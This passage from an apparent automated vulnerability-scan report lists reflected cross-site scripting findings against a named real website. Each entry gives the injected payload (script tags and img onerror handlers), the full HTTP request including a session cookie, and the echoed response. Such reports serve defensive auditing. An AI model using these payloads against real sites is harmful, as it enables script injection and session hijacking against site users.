<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag20ea2<script>alert(1)</script>5252f849e6a/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.4453. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 58d24<img%20src%3da%20onerror%3dalert(1)>d6947fb555c was submitted in the REST URL parameter 2. This input was echoed as 58d24<img src=a onerror=alert(1)>d6947fb555c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes58d24<img%20src%3da%20onerror%3dalert(1)>d6947fb555c/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes58d24<img src=a onerror=alert(1)>d6947fb555c/kosmos/images/rating/0.gif]</td>
...[SNIP]...

2.4454. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 8a901</title><img%20src%3da%20onerror%3dalert(1)>b0c282dd456 was submitted in the REST URL parameter 2. This input was echoed as 8a901</title><img src=a onerror=alert(1)>b0c282dd456 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes8a901</title><img%20src%3da%20onerror%3dalert(1)>b0c282dd456/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes8a901</title><img src=a onerror=alert(1)>b0c282dd456/kosmos/images/rating/0.gif</title>
...[SNIP]...

2.4455. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35ccb<img%20src%3da%20onerror%3dalert(1)>cde5cffe9af was submitted in the REST URL parameter 3. This input was echoed as 35ccb<img src=a onerror=alert(1)>cde5cffe9af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos35ccb<img%20src%3da%20onerror%3dalert(1)>cde5cffe9af/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos35ccb<img src=a onerror=alert(1)>cde5cffe9af/images/rating/0.gif]</td>
...[SNIP]...

2.4456. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload ca2c8</title><img%20src%3da%20onerror%3dalert(1)>b15e7d829e1 was submitted in the REST URL parameter 3. This input was echoed as ca2c8</title><img src=a onerror=alert(1)>b15e7d829e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmosca2c8</title><img%20src%3da%20onerror%3dalert(1)>b15e7d829e1/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmosca2c8</title><img src=a onerror=alert(1)>b15e7d829e1/images/rating/0.gif</title>
...[SNIP]...

2.4457. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 534fc<img%20src%3da%20onerror%3dalert(1)>f2c91ecdbcc was submitted in the REST URL parameter 4. This input was echoed as 534fc<img src=a onerror=alert(1)>f2c91ecdbcc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images534fc<img%20src%3da%20onerror%3dalert(1)>f2c91ecdbcc/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images534fc<img src=a onerror=alert(1)>f2c91ecdbcc/rating/0.gif]</td>
...[SNIP]...

2.4458. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 24a51</title><img%20src%3da%20onerror%3dalert(1)>f47ba14e50f was submitted in the REST URL parameter 4. This input was echoed as 24a51</title><img src=a onerror=alert(1)>f47ba14e50f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images24a51</title><img%20src%3da%20onerror%3dalert(1)>f47ba14e50f/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images24a51</title><img src=a onerror=alert(1)>f47ba14e50f/rating/0.gif</title>
...[SNIP]...

2.4459. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d7d3e<img%20src%3da%20onerror%3dalert(1)>24db88654d3 was submitted in the REST URL parameter 5. This input was echoed as d7d3e<img src=a onerror=alert(1)>24db88654d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/ratingd7d3e<img%20src%3da%20onerror%3dalert(1)>24db88654d3/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/ratingd7d3e<img src=a onerror=alert(1)>24db88654d3/0.gif]</td>
...[SNIP]...

2.4460. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 2acd6</title><img%20src%3da%20onerror%3dalert(1)>d807a006166 was submitted in the REST URL parameter 5. This input was echoed as 2acd6</title><img src=a onerror=alert(1)>d807a006166 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating2acd6</title><img%20src%3da%20onerror%3dalert(1)>d807a006166/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating2acd6</title><img src=a onerror=alert(1)>d807a006166/0.gif</title>
...[SNIP]...

2.4461. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 62f20</title><img%20src%3da%20onerror%3dalert(1)>47fd1df1a5 was submitted in the REST URL parameter 6. This input was echoed as 62f20</title><img src=a onerror=alert(1)>47fd1df1a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/0.gif62f20</title><img%20src%3da%20onerror%3dalert(1)>47fd1df1a5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/0.gif62f20</title><img src=a onerror=alert(1)>47fd1df1a5</title>
...[SNIP]...

2.4462. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload efb16<img%20src%3da%20onerror%3dalert(1)>7d263e0b2e8 was submitted in the REST URL parameter 6. This input was echoed as efb16<img src=a onerror=alert(1)>7d263e0b2e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/0.gifefb16<img%20src%3da%20onerror%3dalert(1)>7d263e0b2e8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/0.gifefb16<img src=a onerror=alert(1)>7d263e0b2e8]</td>
...[SNIP]...

2.4463. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9d8a7<script>alert(1)</script>9f457131e54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag9d8a7<script>alert(1)</script>9f457131e54/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag9d8a7<script>alert(1)</script>9f457131e54/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.4464. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 79277</title><img%20src%3da%20onerror%3dalert(1)>2339baca94c was submitted in the REST URL parameter 2. This input was echoed as 79277</title><img src=a onerror=alert(1)>2339baca94c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes79277</title><img%20src%3da%20onerror%3dalert(1)>2339baca94c/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes79277</title><img src=a onerror=alert(1)>2339baca94c/kosmos/images/rating/2half.gif</title>
...[SNIP]...

2.4465. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cfc3e<img%20src%3da%20onerror%3dalert(1)>b2069389d58 was submitted in the REST URL parameter 2. This input was echoed as cfc3e<img src=a onerror=alert(1)>b2069389d58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themescfc3e<img%20src%3da%20onerror%3dalert(1)>b2069389d58/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themescfc3e<img src=a onerror=alert(1)>b2069389d58/kosmos/images/rating/2half.gif]</td>
...[SNIP]...

2.4466. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e74ad<img%20src%3da%20onerror%3dalert(1)>5ae9c086f9c was submitted in the REST URL parameter 3. This input was echoed as e74ad<img src=a onerror=alert(1)>5ae9c086f9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmose74ad<img%20src%3da%20onerror%3dalert(1)>5ae9c086f9c/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmose74ad<img src=a onerror=alert(1)>5ae9c086f9c/images/rating/2half.gif]</td>
...[SNIP]...

2.4467. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 587da</title><img%20src%3da%20onerror%3dalert(1)>dd68a7a6ea2 was submitted in the REST URL parameter 3. This input was echoed as 587da</title><img src=a onerror=alert(1)>dd68a7a6ea2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos587da</title><img%20src%3da%20onerror%3dalert(1)>dd68a7a6ea2/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos587da</title><img src=a onerror=alert(1)>dd68a7a6ea2/images/rating/2half.gif</title>
...[SNIP]...

2.4468. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 549fe</title><img%20src%3da%20onerror%3dalert(1)>d9a3d8099dc was submitted in the REST URL parameter 4. This input was echoed as 549fe</title><img src=a onerror=alert(1)>d9a3d8099dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images549fe</title><img%20src%3da%20onerror%3dalert(1)>d9a3d8099dc/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images549fe</title><img src=a onerror=alert(1)>d9a3d8099dc/rating/2half.gif</title>
...[SNIP]...

2.4469. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 30573<img%20src%3da%20onerror%3dalert(1)>c96462afd70 was submitted in the REST URL parameter 4. This input was echoed as 30573<img src=a onerror=alert(1)>c96462afd70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images30573<img%20src%3da%20onerror%3dalert(1)>c96462afd70/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images30573<img src=a onerror=alert(1)>c96462afd70/rating/2half.gif]</td>
...[SNIP]...

2.4470. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload f088b</title><img%20src%3da%20onerror%3dalert(1)>8a79d5525ab was submitted in the REST URL parameter 5. This input was echoed as f088b</title><img src=a onerror=alert(1)>8a79d5525ab in the application's response.

